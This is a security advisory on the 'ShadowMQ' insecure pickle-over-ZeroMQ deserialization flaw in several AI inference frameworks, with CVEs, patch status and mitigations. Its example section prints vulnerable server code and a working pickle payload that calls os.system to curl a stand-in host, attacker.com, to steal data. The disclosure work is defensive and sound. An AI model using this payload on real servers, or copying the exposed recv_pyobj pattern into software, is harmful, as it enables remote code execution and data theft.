"ShadowMQ" exploit pattern reported in major AI frameworks, enables remote code execution
Take action: The development of AI tool is still very much rushed, with insufficient security testing and a lot of copy-paste from other framework. All this because it's a rush to production, not building a secure product. The end user will probably suffer most. In general, be very conservative with AI frameworks, test a lot and patch very fast. For this particular instance, if you're using AI inference frameworks like Meta Llama, vLLM, NVIDIA TensorRT-LLM, SGLang, or Modular Max Server, immediately update to the latest patched versions and make sure ZeroMQ sockets are not exposed to untrusted networks.
Learn More
Cybersecurity researchers from Oligo Security are reporting a widespread pattern of remote code execution vulnerabilities affecting major artificial intelligence inference engines from Meta, Nvidia, Microsoft, and open-source PyTorch projects including vLLM and SGLang.
The vulnerabilities, collectively termed "ShadowMQ," trace back to a common root cause involving the unsafe use of ZeroMQ messaging library and Python's pickle deserialization module. This security flaw has propagated in multiple AI frameworks through code reuse and copy-paste practices, creating a cascade that is exposing AI infrastructures processing sensitive prompts, model weights, and customer data across in many exposed systems on the public internet.
The origin of the ShadowMQ pattern stems from a vulnerability in Meta's Llama large language model framework, tracked as CVE-2024-50050 (CVSS score 6.3 by Meta, Snyk scored it as 9.3).
The flaw is an insecure use of ZeroMQ's recv_pyobj() method to deserialize incoming data using Python's pickle module, which is inherently dangerous when processing untrusted data as it can execute arbitrary code during deserialization. The vulnerability was compounded by the framework exposing ZeroMQ sockets over the network without authentication, creating a scenario where attackers could achieve remote code execution by transmitting malicious serialized objects to vulnerable servers.
Meta patched this vulnerability in October 2024 by replacing the unsafe pickle serialization with a secure JSON-based implementation using Pydantic, and the pyzmq Python library also issued fixes with explicit warnings about using recv_pyobj with untrusted data.
Oligo Security researchers identified that the same insecure deserialization pattern had been replicated in many AI inference frameworks:
- CVE-2025-30165 (CVSS score 8.0) - vLLM framework (addressed by switching to V1 engine by default, though not completely fixed)
- CVE-2025-23254 (CVSS score 8.8) - NVIDIA TensorRT-LLM (fixed in version 0.18.2 with HMAC validation implementation)
- CVE-2025-60455 (CVSS score N/A) - Modular Max Server (patched using msgpack instead of pickle)
- Microsoft Sarathi-Serve research framework (remains unpatched)
- SGLang framework (implemented incomplete fixes despite maintainer acknowledgment)
Exploit Example
Vulnerable Server Code:
import zmq
context = zmq.Context()
socket = context.socket(zmq.REP)
socket.bind("tcp://*:5555") # Exposed to network
# Vulnerable: Uses recv_pyobj with pickle deserialization
data = socket.recv_pyobj() # Attack happens here
process_request(data)Attacker's Malicious Payload:
class Exploit:
def __reduce__(self):
import os
# Arbitrary command execution
return (os.system, ('curl attacker.com/steal-data',))
# Send malicious object to vulnerable server
import zmq
context = zmq.Context()
socket = context.socket(zmq.REQ)
socket.connect("tcp://vulnerable-ai-server:5555")
socket.send_pyobj(Exploit()) # Sends malicious objectWhat Happens:
- Server receives the malicious object
recv_pyobj()callspickle.loads()to deserialize it- Pickle automatically executes
os.system()during deserialization - Attacker's command runs with server privileges
The vulnerable files in SGLang explicitly stated they were "adapted by vLLM," while Modular Max Server borrowed identical logic from both vLLM and SGLang, effectively perpetuating the same critical flaw across multiple codebases maintained by different organizations.
SGLang's adoption by major technology companies including xAI, AMD, Nvidia, Intel, LinkedIn, Cursor, Oracle Cloud, Google Cloud, Microsoft Azure, AWS, and prominent universities amplifies the potential impact of the unpatched vulnerabilities.
Security researcher Avi Lumelsky emphasized that while AI projects are advancing at unprecedented speed and commonly borrow architectural components from peer frameworks, when code reuse inadvertently includes unsafe patterns, the security consequences propagate rapidly across the ecosystem.
Organizations are strongly advised to immediately update affected frameworks to patched versions, restrict exposure of ZeroMQ sockets and review any use of pickle() in their code or libraries.